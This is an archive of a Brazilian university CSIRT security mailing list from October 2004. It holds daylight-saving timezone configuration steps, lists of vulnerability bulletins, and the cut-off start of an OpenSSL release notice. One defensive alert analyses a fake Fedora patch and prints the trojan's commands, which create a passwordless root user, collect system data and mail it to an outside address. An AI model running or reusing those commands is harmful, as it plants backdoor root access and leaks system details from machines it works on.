From security em unicamp.br Wed Oct 6 10:32:09 2004 From: security em unicamp.br (CSIRT - UNICAMP) Date: Wed, 6 Oct 2004 10:32:09 -0300 Subject: [SECURITY-L] CAIS-Alerta: Inicio do Horario de Verao 2004/2005 Message-ID: <20041006133208.GA38205@unicamp.br> ----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca ----- From: Centro de Atendimento a Incidentes de Seguranca Subject: CAIS-Alerta: Inicio do Horario de Verao 2004/2005 To: rnp-alerta em cais.rnp.br, rnp-seg em cais.rnp.br Date: Tue, 5 Oct 2004 17:52:43 -0300 (BRST) -----BEGIN PGP SIGNED MESSAGE----- Prezados, O CAIS gostaria de trazer `a atencao de todos que, de acordo com o Decreto 5.223 de 01 de Outubro de 2004, o horario de verao 2004/2005 tera' inicio a zero hora (00:00) do dia 02 de Novembro de 2004, com termino a zero hora (00:00) do dia 20 de Fevereiro de 2005. Para tanto, no proximo dia 02 de Novembro, sera' preciso adiantar os relogios em 1 hora nos estados que participam do horario de verao. Sao eles: . Distrito Federal . Espirito Santo . Goias . Mato Grosso . Mato Grosso do Sul . Minas Gerais . Parana . Rio de Janeiro . Rio Grande do Sul . Santa Catarina . Sao Paulo Lembramos a todos que, tratando-se de incidentes de seguranca, a precisao dos relogios dos sistemas e' fundamental para manter a consistencia dos logs, alem de ser imprescindivel nas investigacoes e identificacao de responsaveis. Lembramos ainda que os logs reportados durante a vigencia do horario de verao estarao no timezone GMT-2. O Decreto 5.223, que institui o horario de verao 2004/2005 no territorio nacional, esta' disponivel no seguinte endereco: . http://www.mme.gov.br/Ministerio/legislacao/decretos/Decreto%20n%205.223.htm O CAIS esta' a disposicao para maiores esclarecimentos. Atenciosamente, ################################################################ # CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA (CAIS) # # Rede Nacional de Ensino e Pesquisa (RNP) # # # # cais em cais.rnp.br http://www.cais.rnp.br # # Tel. 019-37873300 Fax. 019-37873301 # # Chave PGP disponivel http://www.rnp.br/cais/cais-pgp.key # ################################################################ -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBQWMJpOkli63F4U8VAQHszQP/aPK+mG75JHXFPmFu8d0J+N/uOPFUZcRI xz4Ohl4aF3v0hN2QnKgq2XIeqw9sE9WFcblYh68FnEaYbnfza158dVzSFiDGKqcS +7rtN4JdaUV64IcqpRyxYYDU54auy8ZIEZGt/qYdo/2j0IKH6UuWrrp9c/JdyIY9 cR3vTB3JiQo= =mGKG -----END PGP SIGNATURE----- ----- End forwarded message ----- From security em unicamp.br Wed Oct 6 11:01:46 2004 From: security em unicamp.br (CSIRT - UNICAMP) Date: Wed, 6 Oct 2004 11:01:46 -0300 Subject: [SECURITY-L] CAIS-Alerta: Alteracoes de configuracao necessarias para o Horario de Verao 2004/2005 Message-ID: <20041006140146.GB38205@unicamp.br> ----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca ----- From: Centro de Atendimento a Incidentes de Seguranca Subject: CAIS-Alerta: Alteracoes de configuracao necessarias para o Horario de Verao 2004/2005 To: rnp-alerta em cais.rnp.br, rnp-seg em cais.rnp.br Date: Tue, 5 Oct 2004 18:00:43 -0300 (BRST) -----BEGIN PGP SIGNED MESSAGE----- Prezados, Como foi devidamente anunciado pelo CAIS, o inicio do horario de verao 2004/2005 ocorrera' no proximo dia 02 de Novembro de 2004. Com isto, algumas configuracoes nos sistemas se fazem necessarias. A ideia basica e' que o sistema sofra mudancas apenas no fuso horario adotado (zoneinfo), de forma que sejam atualizados somente os relogios locais (localtime) das maquinas. Deve-se tomar especial cuidado com os seguintes casos: 1. Sistemas onde o timezone correto nao esteja sendo utilizado e o horario seja ajustado manualmente podem sofrer desvios de horario com o inicio do horario de verao. 2. Tarefas do sistema agendadas para o intervalo entre 00:00 h a 01:00 h AM nao serao executadas no dia 02 de Novembro de 2004, quando do inicio do horario de verao. 3. Tarefas do sistema agendadas para o intervalo entre 23:00 h e 00:00 h serao executadas duas vezes no dia 20 de Fevereiro de 2005, quando do fim do horario de verao. A seguir e' descrito o procedimento de atualizacao do localtime em sistemas FreeBSD, GNU/Linux, Solaris, AIX e Windows, bem como em alguns equipamentos Cisco que usem o IOS. Antes de prosseguir com estes procedimentos e' preciso que se saiba de antemao o timezone da sua regiao. *DICA! Aqueles que nao souberem qual o timezone da sua regiao podem consultar o site do Observatorio Nacional (http://www.on.br/institucional/index.html), no link "Servico da Hora", onde pode ser encontrada uma tabela com as informacoes pertinentes. IOS-Cisco ========= Nos arquivos de configuracao dos roteadores Cisco sera' preciso incluir (ou atualizar) as seguintes linhas: clock timezone GMT-3 -3 clock summer-time GMT-2 date Nov 02 2004 0:00 Feb 20 2005 0:00 *OBS! Os logs gerados pelo Cisco passarao a informar a hora como GMT-2 que e' a nova timezone. GNU/Linux ========= Usuarios GNU/Linux devem seguir o procedimento abaixo: 1. Verificar a existencia do arquivo '/etc/localtime' e se este arquivo e' um link. * DICA! Nao e' recomendado possuir o arquivo /etc/localtime com link para o arquivo /usr/share/zoneinfo/Brazil/East, pois sistemas em que o diretorio /usr nao estiver acessivel (nao tiver sido montado, por exemplo) no momento de inicializacao da maquina, as informacoes contidas no localtime nao serao carregadas. 2. Verificar se no diretorio /usr/share/zoneinfo/Brazil existe algum arquivo NAO BINARIO que contenha informacoes relativas a outros horarios de verao (DICA!: geralmente um arquivo com extensao .zic) a) Se nao existir nenhum arquivo com tais informacoes, devera' ser criado um novo, de nome 'verao.2004.zic' por exemplo, e inserir as seguintes linhas. Rule Brazil 2004 only - Nov 2 00:00 1 D Rule Brazil 2005 only - Feb 20 00:00 0 S Zone Brazil/East -3:00 Brazil BR%sT b) Se existir algum arquivo com informacoes de horario de verao de outros anos, bastara' inserir as linhas mencionadas. As duas primeiras linhas dizem quando se inicia o horario de verao, quando termina, e qual a acao a ser tomada. Lembre-se que no inicio do horario de verao, deve ser adicionada uma hora. A ultima linha diz qual o arquivo que sera' gerado pelo comando zic, no exemplo sera' o arquivo 'East' (dentro do diretorio Brazil). Esta linha tambem informa o timezone da regiao, no caso de Sao Paulo e' -3. 3. Com o arquivo 'verao.2004.zic' em maos, deve-se executar o comando 'zic', tal como segue: # zic verao.2004.zic No caso particular, este comando atualizara' o arquivo East. 4. Por ultimo, se o arquivo /etc/localtime nao for um link para este arquivo deve-se copiar o arquivo East para /etc/localtime # cp East /etc/localtime FreeBSD ======= Usuarios do sistema FreeBSD devem proceder da mesma forma que usuarios GNU/Linux. A unica diferenca e' que o diretorio onde devera' ser criado o arquivo verao.2004.zic sera' o /usr/share/zoneinfo. Como anteriormente dito, as linhas a serem incluidas neste arquivo sao: Rule Brazil 2004 only - Nov 2 00:00 1 D Rule Brazil 2005 only - Feb 20 00:00 0 S Zone hv2004 -3:00 Brazil BR%sT No exemplo acima, o nome 'hv2004' representa o arquivo que sera' criado ao executar o comando 'zic verao.2004.zic', o qual contera' as informacoes do horario de verao. Este novo arquivo devera' ser copiado para /etc/localtime, lembrando que sera' preciso fazer uma copia do arquivo /etc/localtime antes de sobrescreve-lo. Solaris ======= Usuarios de Solaris devem seguir o procedimento abaixo: 1. Verificar o zoneinfo respectivo. O arquivo /etc/TIMEZONE contem as informacoes relativas a qual arquivo sera' consultado para verificar o zoneinfo. # more /etc/TIMEZONE TZ=Brazil/East No exemplo acima, devera' ser consultado o arquivo East, no diretorio Brazil. Por default, este diretorio deve estar em /usr/share/lib/zoneinfo. 2. Verificar se no diretorio /usr/share/lib/zoneinfo existe algum arquivo NAO BINARIO que contenha informacao relativa a outros horarios de verao (DICA!: geralmente um arquivo com extensao .zic) a) Se nao existir nenhum arquivo com tais informacoes, devera' ser criado um novo arquivo, de nome 'brazil.zic' por exemplo, e inserir as seguintes linhas. Rule Brazil 2004 only - Nov 2 00:00 1 D Rule Brazil 2005 only - Feb 20 00:00 0 S Zone Brazil/East -3:00 Brazil BR%sT b) Se existir arquivo com informacoes de horario de verao de outros anos bastara' inserir as linhas acima. As duas primeiras linhas dizem quando se inicia o horario de verao, quando termina, e qual a acao a ser tomada. Lembre-se que no inicio do horario de verao, deve ser adicionada uma hora. A ultima linha diz qual o arquivo que sera' gerado pelo comando zic, no exemplo sera' o arquivo 'East' (dentro do diretorio Brazil). Esta linha tambem informa o timezone da regiao, no caso de Sao Paulo e' -3. No exemplo que segue, existe um diretorio Brazil dentro de /usr/share/lib/zoneinfo que contem um arquivo brazil.zic que deve ser atualizado com as linhas acima mencionadas. 3. Deve-se entao gerar o novo arquivo (em formato binario) como segue: # zic brazil.zic Este comando ira' gerar automaticamente o arquivo East como foi indicado no arquivo /etc/TIMEZONE. OBS: Tem sido observado em sistemas Solaris que o daemon que escalona processos (cron) deixa de executar tarefas depois das alteracoes citadas em decorrencia do horario de verao. Para tanto, sera' preciso reinicializar o daemon apos a entrada do horario de verao. AIX === Usuarios de AIX devem alterar o arquivo /etc/environment colocando a diretiva: 2004: TZ=GRNLNDST3GRNLNDDT,M11.0.2/00:00:00,M2.2.0/00:00:00 Isto indica que o horario de verao se inicia `as 00:00 da primeira terca-feira do mes 11 (02 de Novembro) e finaliza `as 00:00 do terceiro domingo do mes 2 (20 de Fevereiro), seguindo a seguinte sintaxe: Mm.w.wd/hh:mm . m - mes ( 1 < m < 12 ) . w - semana (7 dias) do mes contados a partir do dia 1o. (0 < d < 6) . wd - dia da semana ( 0 < n < 5 : Domingo corresponde a 0) . hh:mm - horario Windows ======= Para sistemas Windows 9*/NT/2000/XP, recomenda-se o uso do utilitario TZEDIT (tzedit.exe), incluido no CD do Resource Kit que acompanha na distribuicao do sistema. Nao existe URL oficial para fazer download deste programa no site da Microsoft, mas ele pode ser facilmente encontrado na Internet, lembrando que neste ultimo caso NAO existe garantia na integridade do programa. Ao ser executado este utilitario devera' ser indicado que o horario de verao inicia-se `as 00:00 da primeira terca-feira do mes de Novembro de 2004 e finaliza `as 00:00 do terceiro domingo do mes de Fevereiro de 2005. O CAIS esta' a disposicao para maiores esclarecimentos. Atenciosamente, ################################################################ # CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA (CAIS) # # Rede Nacional de Ensino e Pesquisa (RNP) # # # # cais em cais.rnp.br http://www.cais.rnp.br # # Tel. 019-37873300 Fax. 019-37873301 # # Chave PGP disponivel http://www.rnp.br/cais/cais-pgp.key # ################################################################ -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBQWMLgekli63F4U8VAQFqYgP9EXG9rE0vnhCUXBtp8pYpoWYLSUX39ngX 8SY0f6e0c89za34kasnrv61GrxTeaAkJSGkCBD3z1iXMNpCak8CcZlxsnRaAQ7Y0 d3ymJHgDUBoeJ0OeA/6ZeAC4AiC3JqflommVLbf6/cLkDPLBBykiCs1u5uiGKw1o LBHMLA0R4fo= =Kk5u -----END PGP SIGNATURE----- ----- End forwarded message ----- From security em unicamp.br Wed Oct 6 16:19:56 2004 From: security em unicamp.br (CSIRT - UNICAMP) Date: Wed, 6 Oct 2004 16:19:56 -0300 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20041006191956.GC38205@unicamp.br> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Srs. Usuarios, Atualizamos o site do CSIRT (Computer Security Incident Response Team) da Unicamp com os seguintes boletins de vulnerabilidades: CAIS-Alerta: - ------------ 05/10/2004 Assunto: Alteracoes de configuracao necessarias para o Horario de Verao 2004/2005. http://www.security.unicamp.br/docs/bugs/2004/10/v19.txt 05/10/2004 Assunto: Inicio do Horario de Verao 2004/2005. http://www.security.unicamp.br/docs/bugs/2004/10/v18.txt Debian Security Advisory: - ------------------------- 04/10/2004 - DSA 557-1 Assunto: vulnerabilidade de seguranca nos pacotes rp-pppoe, pppoe. http://www.security.unicamp.br/docs/bugs/2004/10/v8.txt 02/10/2004 - DSA 556-1 Assunto: vulnerabilidade de seguranca no pacote netkit-telnet. http://www.security.unicamp.br/docs/bugs/2004/10/v5.txt 30/09/2004 - DSA 555-1 Assunto: vulnerabilidade de seguranca no pacote freenet6. http://www.security.unicamp.br/docs/bugs/2004/09/v132.txt 27/09/2004 - DSA 553-1 Assunto: vulnerabilidade de seguranca no pacote getmail. http://www.security.unicamp.br/docs/bugs/2004/09/v131.txt Fedora Legacy Update Advisory: - ------------------------------ 04/10/2004 - FLSA:1324 Assunto: Updated libxml2 resolves security vulnerability. http://www.security.unicamp.br/docs/bugs/2004/10/v9.txt 03/10/2004 - FLSA:1325 Assunto: Updated mod_python resolves security vulnerability. http://www.security.unicamp.br/docs/bugs/2004/10/v7.txt 03/10/2004 - FLSA:1372 Assunto: Updated sysstat packages fix security vulnerabilities. http://www.security.unicamp.br/docs/bugs/2004/10/v6.txt 02/10/2004 - FLSA:1733 Assunto: Updated squirrelmail resolves security vulnerabilities. http://www.security.unicamp.br/docs/bugs/2004/10/v4.txt Fedora Update Notification: - --------------------------- 05/10/2004 - FEDORA-2004-331 Assunto: Fedora Core 2: cups. http://www.security.unicamp.br/docs/bugs/2004/10/v17.txt FreeBSD Security Advisory: - -------------------------- 04/10/2004 - FreeBSD-SA-04:15 Assunto: vulnerabilidade de seguranca no pacote syscons. http://www.security.unicamp.br/docs/bugs/2004/10/v13.txt Gentoo Linux Security Advisory: - ------------------------------- 04/10/2004 - GLSA 200410-02 Assunto: Netpbm: Multiple temporary file issues. http://www.security.unicamp.br/docs/bugs/2004/10/v10.txt 01/10/2004 - GLSA 200410-01 Assunto: sharutils: Buffer overflows in shar.c and unshar.c. http://www.security.unicamp.br/docs/bugs/2004/10/v1.txt HP Security Bulletin: - --------------------- 04/10/2004 - HPSBTU01081 Assunto: Mozilla Application Suite for HP Tru64 UNIX Multiple Potential Security Vulnerabilities. http://www.security.unicamp.br/docs/bugs/2004/10/v14.txt KDE Security Advisories: - ------------------------ Mandrakelinux Security Update Advisory: - --------------------------------------- 01/10/2004 - MDKSA-2004:104 Assunto: vulnerabilidade de seguranca no pacote samba. http://www.security.unicamp.br/docs/bugs/2004/10/v3.txt Microsoft Security Bulletins: - ----------------------------- Mozilla Security Advisory: - -------------------------- NetBSD Security Advisory: - ------------------------- Netwosix Linux Security Advisory: - --------------------------------- OpenPKG Security Advisory: - -------------------------- Samba Security Release: - ----------------------- SCO Security Advisory: - ---------------------- SGI Security Advisory: - ---------------------- Slackware Security Advisory: - ---------------------------- 04/10/2004 - SSA:2004-278-02 Assunto: vulnerabilidade de seguranca no pacote zlib DoS. http://www.security.unicamp.br/docs/bugs/2004/10/v12.txt 04/10/2004 - SSA:2004-278-01 Assunto: vulnerabilidade de seguranca no pacote getmail. http://www.security.unicamp.br/docs/bugs/2004/10/v11.txt SUSE Security Announcement: - --------------------------- 05/10/2004 - SUSE-SA:2004:035 Assunto: vulnerabilidade de seguranca no pacote samba. http://www.security.unicamp.br/docs/bugs/2004/10/v16.txt Trustix Secure Linux Security Advisory: - --------------------------------------- 01/10/2004 - #2004-0051 Assunto: vulnerabilidade de seguranca no pacote samba. http://www.security.unicamp.br/docs/bugs/2004/10/v2.txt 30/09/2004 - #2004-0050 Assunto: vulnerabilidade de seguranca nos pacotes: gettext, ghostscript, glibc, groff, gzip, kerberos5, lvm, mysql, netatalk, openssl, perl, postgresql. http://www.security.unicamp.br/docs/bugs/2004/09/v133.txt US-CERT Technical Cyber Security Alert: - --------------------------------------- - -- Computer Security Incident Response Team - CSIRT Universidade Estadual de Campinas - UNICAMP mailto:security at unicamp.br http://www.security.unicamp.br GnuPG Public Key: http://www.security.unicamp.br/security.asc -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (FreeBSD) iD8DBQFBZEUv/UMb1l3gm8IRAv5KAJ45uA67mueJ5b0Dvd/BCQNbQBYAlwCg3hoO taqAqlHqwGmZflAmW2Bt6z8= =Plzh -----END PGP SIGNATURE----- From security em unicamp.br Wed Oct 13 16:08:27 2004 From: security em unicamp.br (CSIRT - UNICAMP) Date: Wed, 13 Oct 2004 16:08:27 -0300 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20041013190827.GB50682@unicamp.br> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Srs. Usuarios, Atualizamos o site do CSIRT (Computer Security Incident Response Team) da Unicamp item Documentos, Vulnerabilidades de Seguranca, URL=http://www.ccuec.unicamp.br/seguranca/index_html?foco=HTML/61785&foco2=HTML/61785/172029 com os seguintes boletins: CAIS-Alerta: - ------------ 08/10/2004 Assunto: Vulnerabilidade no Microsoft ASP.NET (AL-2004.031). 08/10/2004 Assunto: Vulnerabilidade no Microsoft Word (SA12758). Debian Security Advisory: - ------------------------- 13/10/2004 - DSA 564-1 Assunto: vulnerabilidade de seguranca no pacote mpg123. 12/10/2004 - DSA 563-2 Assunto: vulnerabilidade de seguranca no pacote cyrus-sasl. 12/10/2004 - DSA 563-1 Assunto: vulnerabilidade de seguranca no pacote cyrus-sasl. 11/10/2004 - DSA 562-1 Assunto: vulnerabilidade de seguranca no pacote mysql. 10/10/2004 - DSA 458-3 Assunto: vulnerabilidade de seguranca no pacote python2.2. 07/10/2004 - DSA 560-1 Assunto: vulnerabilidade de seguranca no pacote lesstif1-1. 07/10/2004 - DSA 600-1 Assunto: vulnerabilidade de seguranca no pacote samba. 06/10/2004 - DSA 559-1 Assunto: vulnerabilidade de seguranca no pacote net-acct. 06/10/2004 - DSA 558-1 Assunto: vulnerabilidade de seguranca no pacote libapache-mod-dav. Fedora Update Notification: - --------------------------- 13/10/2004 - FEDORA-2004-338 Assunto: Fedora Core 2: squid. 08/10/2004 - FEDORA-2004-331 Assunto: Fedora Core 2: cyrus-sasl. 07/10/2004 - CORRECT: FEDORA-2004-330 Assunto: Fedora Core 2: squid. 06/10/2004 - FEDORA-2004-330 Assunto: Fedora Core 2: squid. Gentoo Linux Security Advisory: - ------------------------------- 09/10/2004 - GLSA 200410-06 Assunto: CUPS: Leakage of sensitive information. 07/10/2004 - GLSA 200410-05 Assunto: Cyrus-SASL: Buffer overflow and SASL_PATH vulnerabilities. 06/10/2004 - GLSA 200410-04 Assunto: PHP: Memory disclosure and arbitrary location file upload. Mandrakelinux Security Update Advisory: - --------------------------------------- 07/10/2004 - MDKSA-2004:106 Assunto: vulnerabilidade de seguranca no pacote cyrus-sasl. 06/10/2004 - MDKSA-2004:105 Assunto: vulnerabilidade de seguranca no pacote xine-lib. Microsoft Security Bulletins: - ----------------------------- 12/10/2004 Assunto: Microsoft Security Bulletin Re-Releases, October, 2004. SCO Security Advisory: - ---------------------- 07/10/2004 - SCOSA-2004.16 Assunto: UnixWare 7.1.4 : Multiple Vulnerabilities in libpng. 07/10/2004 - SCOSA-2004.15 Assunto: UnixWare 7.1.3up UnixWare 7.1.4 : CUPS before 1.1.21 allows remote attackers to cause a denial of service. Slackware Security Advisory: - ---------------------------- 12/10/2004 - SSA:2004-285-01 Assunto: vulnerabilidade de seguranca no pacote rsync. SUSE Security Announcement: - --------------------------- 06/10/2004 - SUSE-SA:2004:036 Assunto: vulnerabilidade de seguranca no pacote mozilla. Trustix Secure Linux Security Advisory: - --------------------------------------- 08/10/2004 - #2004-0053 Assunto: vulnerabilidade de seguranca no pacote cyrus-sasl. - -- Computer Security Incident Response Team - CSIRT Universidade Estadual de Campinas - UNICAMP mailto:security at unicamp.br http://www.security.unicamp.br GnuPG Public Key: http://www.security.unicamp.br/security.asc -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (FreeBSD) iD8DBQFBbX0D/UMb1l3gm8IRArJ0AJ90Eru9gPxAsoOGk2KQ+oUA1MmVWACcDYM3 qrmHzMCSIVO/npGZNW8EOUQ= =L0b1 -----END PGP SIGNATURE----- From security em unicamp.br Fri Oct 15 10:04:05 2004 From: security em unicamp.br (CSIRT - UNICAMP) Date: Fri, 15 Oct 2004 10:04:05 -0300 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20041015130405.GO322@unicamp.br> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Srs. Assinantes, Atualizamos o site do CSIRT (Computer Security Incident Response Team) da Unicamp item Documentos, Vulnerabilidades de Seguranca, URL=http://www.security.unicamp.br:9000/GECON/sites/seguranca/index_html?foco=HTML/61785&foco2=HTML/61785/172029 com os seguintes boletins: Anúncio de Segurança do Conectiva Linux: - ---------------------------------------- 14/10/2004 - CLA-2004:873 Assunto: Correções para vulnerabilidades do samba. 14/10/2004 - CLA-2004:872 Assunto: Correção para vulnerabilidade de negação de serviço no CUPS. Debian Security Advisory: - ------------------------- 14/10/2004 - DSA 566-1 Assunto: vulnerabilidades de seguranca no pacote cupsys. 14/10/2004 - DSA 563-3 Assunto: vulnerabilidades de seguranca no pacote cyrus-sasl. 13/10/2004 - DSA 565-1 Assunto: vulnerabilidades de seguranca no pacote sox. Fedora Legacy Update Advisory: - ------------------------------ 13/10/2004 - FLSA:1888 Assunto: Updated mod_ssl package fixes Apache security vulnerabilities. 13/10/2004 - FLSA:1737 Assunto: Updated httpd packages fix a mod_proxy security vulnerability. 13/10/2004 - FLSA:1833 Assunto: Updated lha resolves security vulnerabilities. 13/10/2004 - FLSA:2102 Assunto: Updated samba resolves security vulnerabilities. Fedora Update Notification: - --------------------------- 15/10/2004 - FEDORA-2004-264 Assunto: Fedora Core 2: ruby. 14/10/2004 - FEDORA-2004-334 Assunto: Fedora Core 2: libtiff. Gentoo Linux Security Advisory: - ------------------------------- 14/10/2004 - GLSA 200410-12 Assunto: WordPress: HTTP response splitting and XSS vulnerabilities. 13/10/2004 - GLSA 200410-11 Assunto: tiff: Buffer overflows in image decoding. 10/10/2004 - GLSA 200410-10 Assunto: gettext: Insecure temporary file handling. 09/10/2004 - GLSA 200410-09 Assunto: LessTif: Integer and stack overflows in libXpm. OpenPKG Security Advisory: - -------------------------- 14/10/2004 - OpenPKG-SA-2004.043 Assunto: vulnerabilidade de seguranca no pacote tiff. - -- Computer Security Incident Response Team - CSIRT Universidade Estadual de Campinas - UNICAMP mailto:security at unicamp.br http://www.security.unicamp.br GnuPG Public Key: http://www.security.unicamp.br/security.asc -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (FreeBSD) iD8DBQFBb8p0/UMb1l3gm8IRAno+AJkBgG7P0btWoVz/nb8q2QR0VjluNACgl/2I WnVkpbix+BJfDGi76W/MrF8= =uO9H -----END PGP SIGNATURE----- From security em unicamp.br Mon Oct 18 15:19:43 2004 From: security em unicamp.br (CSIRT - UNICAMP) Date: Mon, 18 Oct 2004 15:19:43 -0300 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20041018181942.GA2873@unicamp.br> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Srs. Assinantes, Atualizamos o site do CSIRT (Computer Security Incident Response Team) da Unicamp item Documentos, Vulnerabilidades de Seguranca, URL=http://www.ccuec.unicamp.br/seguranca/index_html?foco=HTML/61785&foco2=HTML/61785/172029 com os seguintes boletins: Anúncio de Segurança do Conectiva Linux: - ---------------------------------------- 18/10/2004 - CLA-2004:875 Assunto: Correções para vulnerabilidades ao carregar imagens no pacote gtk+. CAIS-Alerta: - ------------ 15/10/2004 Assunto: Patch acumulativo para Microsoft Internet Explorer (MS04-038). Assunto: Vulnerabilidade remota no Windows Shell (MS04-037). Assunto: Vulnerabilidade no Microsoft NNTP (MS04-036). Assunto: Vulnerabilidade no Microsoft SMTP (MS04-035) Assunto: Vulnerabilidade nas pastas compactadas do Microsoft Windows (MS04-034). Assunto: Vulnerabilidade no Microsoft Excel (MS04-033) Assunto: Atualizacoes de seguranca para Microsoft Windows (MS04-032). Assunto: Vulnerabilidade no Microsoft NetDDE (MS04-031). Assunto: Vulnerabilidade no Microsoft WebDAV (MS04-030). Assunto: Vulnerabilidade no Microsoft RPC (MS04-029). Debian Security Advisory: - ------------------------- 15/10/2004 - DSA 567-1 Assunto: vulnerabilidade de seguranca no pacote tiff. Fedora Legacy Update Advisory: - ------------------------------ 14/10/2004 - FLSA:2102 Assunto: Updated samba resolves security vulnerabilities. Gentoo Linux Security Advisory: - ------------------------------- 15/10/2004 - GLSA 200410-13 Assunto: BNC: Input validation flaw. OpenPKG Security Advisory: - -------------------------- 15/10/2004 - OpenPKG-SA-2004.044 Assunto: vulnerabilidade de seguranca no apache (option "with_mod_ssl yes" only). Trustix Secure Linux Security Advisory: - --------------------------------------- 15/10/2004 - #2004-0054 Assunto: vulnerabilidades de seguranca nos pacotes libtiff, mysql, squid e cyrus-sasl. - -- Computer Security Incident Response Team - CSIRT Universidade Estadual de Campinas - UNICAMP mailto:security at unicamp.br http://www.security.unicamp.br GnuPG Public Key: http://www.security.unicamp.br/security.asc -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (FreeBSD) iD8DBQFBdAkV/UMb1l3gm8IRAtq8AJ9z+4daeFhqID0oATHTVI4U8zKRQgCePg8o lnf57lIZWCuwYQkb6Nopsjk= =2+U0 -----END PGP SIGNATURE----- From security em unicamp.br Mon Oct 25 16:31:01 2004 From: security em unicamp.br (CSIRT - UNICAMP) Date: Mon, 25 Oct 2004 16:31:01 -0300 Subject: [SECURITY-L] CAIS-Alerta: Falso alerta do Fedora-RedHat Message-ID: <20041025193100.GB14681@unicamp.br> ----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca ----- From: Centro de Atendimento a Incidentes de Seguranca Subject: CAIS-Alerta: Falso alerta do Fedora-RedHat To: rnp-alerta em cais.rnp.br, rnp-seg em cais.rnp.br Date: Mon, 25 Oct 2004 15:37:51 -0300 (BRST) -----BEGIN PGP SIGNED MESSAGE----- Prezados, O CAIS esta' acompanhando desde ontem a divulgacao de uma mensagem falsa cujo conteudo tenta se passar por um alerta de seguranca da distribuicao Fedora. Tal alerta faz referencia ao site http://fedora-redhat.com/, onde e' disponibilizada uma falsa correcao, fileutils-1.0.6.patch.tar.gz (68349c219d941209af8f7c968b89d622). Este arquivo e' composto dos seguintes arquivos: 990084 Out 23 16:06 fileutils-patch.bin (7d6f449488f8e7360c74101c20e4052c) 14297 Out 23 13:02 inst.c (c6b4e5e288b6ab9ea6157794df811d8f) 32 Out 22 21:59 Makefile (fe6c3513f6f0fa47392e89071ba9cde6) Analise: De acordo com as analises realizadas nos arquivos, esta falsa correcao nao explora nenhuma vulnerabilidade no sistema. Ela depende da acao do usuario que, ao instalar a suposta correcao como usuario "root", permite que as acoes descritas abaixo sejam executadas: . O script "inst.c" deve ser compilado e executado. Ele verifica se o usuario esta executando como "root"; . Ao ser executado, um usuario chamado "bash" é criado com permissoes de super-usuario e sem senha; . O script cria um arquivo chamado /tmp/mama, com o conteudo dos seguintes comandos: echo "Inca un root frate belea: " >> /tmp/mama adduser -g 0 -u 0 -o bash >> /tmp/mama passwd -d bash >> /tmp/mama ifconfig >> /tmp/mama uname -a >> /tmp/mama uptime >> /tmp/mama sshd >> /tmp/mama echo "user bash stii tu" >> /tmp/mama . E' enviado um e-mail para root em addlebrain.com, com o Subject: "Inca o roata", com o conteudo do arquivo /tmp/mama . O script cria o seguinte diretorio: /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." " . saida da execucao do binario "inst", resultante da compilacao do codigo-fonte inst.c incluso no pacote: identifying the system. This may take up to 2 minutes. Please wait ... ./inst: sshd: command not found System looks OK. Proceeding to next step. Patching "ls": ########### Patching "mkdir": ########### System updated and secured successfuly. You may erase these files. [root em localhost fileutils-1.0.6.patch]# Mais informacoes: . [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" http://lists.netsys.com/pipermail/full-disclosure/2004-October/028031.html . RedHat.com - Security and Updates http://www.redhat.com/security Os alertas enviados pela RedHat tem como origem o endereco de email secalert em redhat.com e sao assinados digitalmente com uma chave PGP disponivel no seguinte endereco: http://www.redhat.com/security/team/key.html O CAIS recomenda que sempre seja verificada autenticidade de mensagens enviadas por grupos de seguranca e representantes de empresas. Na maioria dos casos e' possivel verificar a integridade dos arquivos a serem instalados. Os Alertas do CAIS tambem sao oferecidos no formato RSS/RDF: http://www.rnp.br/cais/alertas/rss.xml Atenciosamente, ################################################################ # CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA (CAIS) # # Rede Nacional de Ensino e Pesquisa (RNP) # # # # cais em cais.rnp.br http://www.cais.rnp.br # # Tel. 019-37873300 Fax. 019-37873301 # # Chave PGP disponivel http://www.rnp.br/cais/cais-pgp.key # ################################################################ -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBQX1ICekli63F4U8VAQEsAQP+MZpypjATgjkh6ec5/lnnsIM1KdZS43n/ R2oRI6E4L7w08lcMgUmRQIiV5cDq0xNm3/vRsGxubwN82ZIMjkqHp964aIpEUB14 J+aQ5CZYELyfk5CpfbjVZPsobodgcUJF8AkqdzzqfllKPUQXo8IQ+FlYDKmrqPJN AkS7CdwHBaI= =OWs+ -----END PGP SIGNATURE----- ----- End forwarded message ----- From security em unicamp.br Tue Oct 26 14:06:00 2004 From: security em unicamp.br (CSIRT - UNICAMP) Date: Tue, 26 Oct 2004 14:06:00 -0300 Subject: [SECURITY-L] OpenSSL 0.9.7e released Message-ID: <20041026170600.GA16945@unicamp.br> ----- Forwarded message from Mark J Cox ----- From: Mark J Cox Subject: [S] OpenSSL 0.9.7e released To: openssl-announce em openssl.org, openssl-users em openssl.org, openssl-dev em openssl.org Date: Mon, 25 Oct 2004 14:49:49 +0100 (BST) -----BEGIN PGP SIGNED MESSAGE----- OpenSSL version 0.9.7e released ========================================== OpenSSL - The Open Source toolkit for SSL/TLS http://www.openssl.org/ The OpenSSL project team is pleased to announce the release of version 0.9.7e of our open source toolkit for SSL/TLS. This new OpenSSL version is a bugfix release and incorporates changes and bugfixes to the toolkit (for a complete list see http://www.openssl.org/source/exp/CHANGES ). The most significant changes are: o 